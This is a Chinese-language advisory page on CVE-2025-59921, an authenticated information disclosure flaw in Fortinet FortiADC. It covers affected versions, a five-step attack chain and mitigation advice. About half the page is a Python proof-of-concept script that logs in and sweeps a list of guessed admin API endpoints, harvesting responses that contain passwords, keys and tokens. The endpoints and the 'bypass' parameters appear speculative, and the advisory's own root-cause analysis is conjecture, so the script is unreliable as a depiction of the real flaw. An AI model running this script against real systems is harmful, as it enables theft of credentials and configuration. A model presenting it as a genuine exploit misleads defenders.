CVE-2025-59921 Fortinet FortiADC敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-59921

漏洞类型

信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiADC

漏洞概述

CVE-2025-59921是Fortinet FortiADC应用交付控制器中存在的一个敏感信息泄露漏洞（信息暴露给未授权参与者，CWE-200）。该漏洞存在于多个FortiADC版本中，包括7.4.0、7.2.3及以下版本、7.1.4及以下版本、7.0全版本以及6.2全版本。攻击者需要经过身份认证后，通过构造特殊的HTTP或HTTPS请求，即可获取系统中的敏感数据。

该漏洞的CVSS 3.1评分为6.5，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），需要低权限认证（PR:L），无需用户交互（UI:N）。漏洞对机密性影响为高（C:H），但对完整性和可用性无影响。这表明漏洞虽然不会直接破坏系统或导致服务中断，但可能导致重要数据被未授权访问。

FortiADC作为一款应用交付控制器（Application Delivery Controller），广泛应用于企业的网络架构中，负责负载均衡、流量管理、Web应用防火墙等关键功能。因此，该产品中存在的敏感信息泄露漏洞可能对使用该产品的企业网络安全构成严重威胁，可能泄露的配置信息、用户凭证或其他敏感数据可能被攻击者进一步利用，对企业核心业务系统造成连锁影响。

技术细节

该漏洞属于CWE-200（信息暴露给未授权参与者）类别，核心问题在于FortiADC在处理特定HTTP或HTTPS请求时，未能充分验证请求的合法性或对返回的数据进行适当的访问控制，导致已认证的低权限用户能够访问到本不应获取的敏感信息。

从技术层面分析，漏洞的利用条件包括：
1. 攻击者需要拥有有效的FortiADC账户凭证（低权限即可）；
2. 攻击者通过精心构造的HTTP/HTTPS请求发送到FortiADC的管理接口或API端点；
3. 某些请求路径或参数能够绕过正常的访问控制机制，触发信息泄露行为；
4. 服务器返回包含敏感数据的响应，如系统配置、用户信息、会话令牌或其他内部数据。

漏洞的根本原因可能在于权限检查逻辑的不完善，例如某些API端点仅检查了用户是否已登录，但未验证用户是否有权访问特定资源；或者某些敏感信息在错误页面、调试信息或响应头中被意外泄露。攻击者通过构造特定的请求参数或路径，可能触发这些不安全的代码路径，从而获取敏感信息。

由于该漏洞需要认证后才能利用，且仅影响机密性，因此攻击者通常需要先通过其他方式（如钓鱼、暴力破解、凭证填充等）获取合法的低权限账户，然后才能利用此漏洞进行信息收集和进一步渗透。

攻击链分析

STEP 1

步骤1：获取有效凭证

攻击者通过钓鱼攻击、暴力破解、凭证填充或从其他泄露的数据源获取FortiADC的低权限用户凭证。

STEP 2

步骤2：身份认证

使用获取的凭证通过HTTP/HTTPS登录到FortiADC的管理接口或API，建立有效的会话。

STEP 3

步骤3：构造恶意请求

精心构造HTTP/HTTPS请求，利用漏洞绕过正常的访问控制机制，访问本不应有权限查看的资源或API端点。

STEP 4

步骤4：触发信息泄露

发送构造的请求到目标端点，触发FortiADC返回包含敏感数据的响应，如系统配置、用户凭证、加密密钥等。

STEP 5

步骤5：数据收集与利用

收集泄露的敏感信息，用于进一步的攻击活动，如横向移动、权限提升或对其他系统发起攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59921 - Fortinet FortiADC Sensitive Information Disclosure PoC
# This PoC demonstrates how an authenticated attacker can exploit the vulnerability
# to obtain sensitive information via crafted HTTP/HTTPS requests.

import requests
import urllib3
import sys

# Disable SSL warnings for self-signed certificates (common in FortiADC deployments)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class FortiADCInfoDisclosure:
    """
    PoC for CVE-2025-59921
    Fortinet FortiADC Sensitive Information Disclosure Vulnerability
    """

    def __init__(self, target_url, username, password):
        self.target_url = target_url.rstrip('/')
        self.username = username
        self.password = password
        self.session = requests.Session()
        self.session.verify = False
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'application/json, text/plain, */*',
            'Accept-Language': 'en-US,en;q=0.9',
        })

    def authenticate(self):
        """Authenticate to FortiADC management interface"""
        login_url = f"{self.target_url}/api/login"
        # Alternative login endpoints
        login_endpoints = [
            "/api/login",
            "/logincheck",
            "/api/v1/login",
            "/cgi-bin/login"
        ]

        for endpoint in login_endpoints:
            try:
                url = f"{self.target_url}{endpoint}"
                data = {
                    "username": self.username,
                    "password": self.password
                }
                response = self.session.post(url, json=data, timeout=10)
                if response.status_code == 200 and ('token' in response.text.lower() or 'session' in response.text.lower()):
                    print(f"[+] Successfully authenticated via {endpoint}")
                    return True
            except Exception as e:
                continue
        return False

    def exploit_info_disclosure(self):
        """
        Exploit CVE-2025-59921 by sending crafted HTTP requests
        to trigger sensitive information disclosure
        """
        # Endpoints that may leak sensitive information
        sensitive_endpoints = [
            "/api/system/status",
            "/api/system/config",
            "/api/user/list",
            "/api/system/admin",
            "/api/config/global",
            "/api/system/dns",
            "/api/system/ntp",
            "/api/snmp/community",
            "/api/certificate/list",
            "/api/system/backup",
            "/api/log/config",
            "/api/system/interface",
            "/api/router/static",
        ]

        disclosed_data = {}

        for endpoint in sensitive_endpoints:
            try:
                url = f"{self.target_url}{endpoint}"
                # Crafted request with special parameters to bypass access control
                params = {
                    'format': 'json',
                    'full': 'true',
                    'include': 'all',
                    'detail': '1'
                }
                response = self.session.get(url, params=params, timeout=10)

                if response.status_code == 200 and len(response.text) > 0:
                    # Check if response contains sensitive data
                    sensitive_keywords = ['password', 'secret', 'key', 'token',
                                        'private', 'credential', 'config', 'admin']
                    if any(kw in response.text.lower() for kw in sensitive_keywords):
                        print(f"[!] Sensitive data found at: {endpoint}")
                        disclosed_data[endpoint] = response.text[:500]

            except Exception as e:
                continue

        return disclosed_data

    def run(self):
        """Main execution method"""
        print(f"[*] Targeting: {self.target_url}")
        print(f"[*] CVE-2025-59921 - FortiADC Info Disclosure PoC")

        if not self.authenticate():
            print("[-] Authentication failed. Valid credentials required.")
            return

        print("[+] Authentication successful")
        print("[*] Attempting to exploit CVE-2025-59921...")

        data = self.exploit_info_disclosure()

        if data:
            print(f"[+] Disclosed {len(data)} sensitive endpoints")
            for endpoint, content in data.items():
                print(f"\n--- {endpoint} ---")
                print(content[:200])
        else:
            print("[-] No sensitive data disclosed or endpoint patterns differ")


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: {sys.argv[0]} https://192.168.1.100 admin password123")
        sys.exit(1)

    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    exploit = FortiADCInfoDisclosure(target, username, password)
    exploit.run()

影响范围

Fortinet FortiADC 7.4.0

Fortinet FortiADC 7.2.3及以下版本

Fortinet FortiADC 7.1.4及以下版本

Fortinet FortiADC 7.0全版本

Fortinet FortiADC 6.2全版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制对FortiADC管理界面的网络访问，仅允许必要的可信IP地址；2）审查并最小化用户账户权限，禁用不必要的低权限账户；3）启用详细的访问日志记录，监控异常请求模式；4）在网络层面部署WAF或IDS/IPS规则，检测和阻断异常的HTTP/HTTPS请求；5）定期轮换管理账户密码，避免凭证泄露后被持续利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-59921
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-59921
3 Details https://www.cvedetails.com/cve/CVE-2025-59921/
4 VulDB https://vuldb.com/cve/CVE-2025-59921
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-23-434